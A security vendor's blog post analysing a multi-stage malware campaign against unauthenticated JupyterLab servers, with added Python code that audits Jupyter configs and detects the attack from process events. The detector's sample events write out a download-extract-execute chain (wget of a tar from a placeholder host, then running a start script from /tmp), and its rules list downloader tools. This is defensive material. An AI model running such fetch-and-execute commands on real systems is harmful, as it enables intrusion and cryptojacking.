Security Research | March 10, 2025

Stopping Sobolan Malware with Aqua Runtime Protection

By Assaf Morag

Aqua Nautilus researchers have discovered a new attack campaign targeting interactive computing environments such as Jupyter Notebooks. The attack consists of multiple stages, beginning with the download of a compressed file from a remote server. Once executed, the attacker deploys several malicious tools to exploit the server and establish persistence.

This campaign poses a significant risk to cloud-native environments, as it enables unauthorized access and long-term control over compromised systems.

The Attacked Workload

Interactive Computing Environments, or Notebook Interfaces, are platforms designed for data scientists and programmers to write, execute, and analyze code interactively. These environments are often internet-facing and normally require authentication before data can be read or code executed. A single misconfiguration, such as running the server without authentication, can expose it to attackers.
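The misconfiguration that matters here is an authentication-free notebook server bound to every interface. The following added example (not Aqua's code and not from the campaign) audits a `jupyter_server_config.py` fragment for exactly that: it parses the standard `c.ServerApp.*` option lines and reports an empty token with no password, a wildcard bind address, and a wildcard CORS origin. Both config fragments are constructed for the example; the weak one shows the exposed setup, the hardened one leaves the token at its default (a random value generated at startup) and binds to loopback only.

```python
import ast
import re

# Constructed sample: a jupyter_server_config.py fragment that disables
# authentication and listens on every interface (the exposed setup).
WEAK_CONFIG = """
c = get_config()
c.ServerApp.ip = '0.0.0.0'
c.ServerApp.port = 8888
c.ServerApp.token = ''
c.ServerApp.allow_origin = '*'
c.ServerApp.open_browser = False
"""

# Constructed sample: the same server with the token left at its default
# (random, generated at startup) and bound to loopback only.
HARDENED_CONFIG = """
c = get_config()
c.ServerApp.ip = '127.0.0.1'
c.ServerApp.port = 8888
c.ServerApp.open_browser = False
"""

# Matches simple `c.ServerApp.option = <literal>` (or NotebookApp) lines.
_SETTING = re.compile(r"^\s*c\.(ServerApp|NotebookApp)\.(\w+)\s*=\s*(.+?)\s*$")


def parse_settings(text):
    """Return {option: value} for the assignment lines the regex understands."""
    settings = {}
    for line in text.splitlines():
        m = _SETTING.match(line)
        if not m:
            continue
        try:
            settings[m.group(2)] = ast.literal_eval(m.group(3))
        except (ValueError, SyntaxError):
            settings[m.group(2)] = m.group(3)  # keep raw text for non-literals
    return settings


def audit_jupyter_config(text):
    """Return a list of human-readable findings; empty means nothing flagged."""
    s = parse_settings(text)
    findings = []
    # An empty token disables token auth; it is only acceptable when a
    # hashed password is configured instead.
    if s.get("token") == "" and not s.get("password"):
        findings.append("auth_disabled: token='' with no password set")
    if s.get("ip") in ("0.0.0.0", "*", "::"):
        findings.append("listens_on_all_interfaces: ip=%r" % s["ip"])
    if s.get("allow_origin") == "*":
        findings.append("cors_wildcard: allow_origin='*'")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_jupyter_config(cfg) or "no findings")
```

The checker is deliberately line-based: it reads the file as text rather than importing it, so it can run in CI against a config that is not meant to execute on the build host. An auth-disabled finding together with a wildcard bind is the combination this campaign relies on.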

Attack Flow

The attackers gained initial access through an unauthenticated JupyterLab instance, allowing them to deploy malware and cryptominers. They first downloaded and extracted a compressed archive containing 13 malicious files, consisting of both binaries and shell scripts. Once executed, these scripts initiated multiple processes to establish persistence, hijack system resources for cryptomining, and evade detection.

The attack follows these steps:

  • Initial Access: The attacker exploits an unauthenticated JupyterLab instance.
  • Download & Extraction: A compressed file (.tar) is downloaded and extracted, revealing 13 malicious files (7 binaries and 6 shell scripts).
  • Execution: The attacker runs a start script, which launches five additional binaries and shell scripts.
  • Persistence & Evasion: The scripts initiate processes to establish persistence, hijack system resources for cryptomining, and avoid detection.
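The four steps above are visible as a process chain rooted at the notebook server: a shell spawned by JupyterLab fetches an archive, unpacks it, and runs a start script from a temporary directory. The following added example (not Aqua's product logic and not taken from the campaign artifacts) runs three such rules over constructed process-creation events of the kind an EDR or audit sensor emits. All PIDs, paths and hostnames are made up; the rules only fire for processes descended from a Jupyter server or kernel, so the same tools in an administrator's SSH session do not alert.

```python
# Constructed process-creation events, in the order the attack flow above
# describes. PIDs, paths and hostnames are invented for the example.
EVENTS = [
    {"pid": 100, "ppid": 1,   "comm": "jupyter-lab",
     "cmdline": "/usr/bin/python3 /usr/local/bin/jupyter-lab --ip=0.0.0.0"},
    {"pid": 120, "ppid": 100, "comm": "bash",
     "cmdline": "/bin/bash -c cd /tmp && wget http://files.example.invalid/pkg.tar -O pkg.tar"},
    {"pid": 130, "ppid": 120, "comm": "wget",
     "cmdline": "wget http://files.example.invalid/pkg.tar -O pkg.tar"},
    {"pid": 140, "ppid": 120, "comm": "tar",
     "cmdline": "tar -xf pkg.tar -C /tmp/pkg"},
    {"pid": 150, "ppid": 120, "comm": "bash",
     "cmdline": "/bin/bash /tmp/pkg/start.sh"},
    {"pid": 160, "ppid": 150, "comm": "worker",
     "cmdline": "/tmp/pkg/worker --config /tmp/pkg/w.conf"},
    # Benign activity from the same notebook server: a package install.
    {"pid": 170, "ppid": 100, "comm": "pip",
     "cmdline": "/usr/bin/python3 -m pip install pandas"},
    # Same tools, but not descended from the notebook server: an admin session.
    {"pid": 200, "ppid": 1,   "comm": "sshd", "cmdline": "sshd: admin [priv]"},
    {"pid": 210, "ppid": 200, "comm": "wget",
     "cmdline": "wget https://releases.example.invalid/tool.tar.gz"},
]

TMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
SHELLS = {"sh", "bash", "dash", "zsh"}
DOWNLOADERS = {"curl", "wget"}


def is_notebook_process(ev):
    text = ev["comm"] + " " + ev["cmdline"]
    return "jupyter" in text or "ipykernel" in text


def under_notebook(pid, by_pid):
    """True if `pid` or any of its ancestors is a Jupyter server/kernel process."""
    seen = set()
    cur = by_pid.get(pid)
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])  # guard against malformed parent cycles
        if is_notebook_process(cur):
            return True
        cur = by_pid.get(cur["ppid"])
    return False


def classify(ev):
    """Map one event to a rule name, or None if it looks benign on its own."""
    args = ev["cmdline"].split()
    comm = ev["comm"]
    # Step 2: a downloader fetching a tar archive.
    if comm in DOWNLOADERS and any(".tar" in a for a in args[1:]):
        return "download_archive"
    # Step 2: extracting an archive (tar with an 'x' in its first option).
    if comm == "tar" and len(args) > 1 and "x" in args[1].lstrip("-"):
        return "extract_archive"
    # Step 3: a binary or script executed from a world-writable temp dir.
    if args and args[0].startswith(TMP_DIRS):
        return "exec_from_tmp"
    if comm in SHELLS and any(a.startswith(TMP_DIRS) for a in args[1:]):
        return "exec_from_tmp"
    return None


def detect(events):
    by_pid = {ev["pid"]: ev for ev in events}
    alerts = []
    for ev in events:
        rule = classify(ev)
        # Scope to the notebook server's process tree: the same commands in
        # an administrator's SSH session are not this campaign.
        if rule and under_notebook(ev["ppid"], by_pid):
            alerts.append({"pid": ev["pid"], "rule": rule, "cmdline": ev["cmdline"]})
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print("%5d  %-16s %s" % (a["pid"], a["rule"], a["cmdline"]))
```

Each rule on its own is noisy (data scientists do download and unpack tarballs), which is why the ancestry check and the ordering matter: a download followed by an extraction and then execution from the extraction directory, all under one notebook server, is the sequence to escalate on. A production detector would correlate the three rules within a time window rather than alert on each.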

How Aqua Detects and Blocks

Aqua's Runtime Protection effectively detects, blocks, and mitigates these threats by leveraging real-time threat intelligence, malware scanning, and customizable runtime policies. Organizations using Aqua can proactively secure their environments against such attacks, ensuring operational integrity and preventing unauthorized access.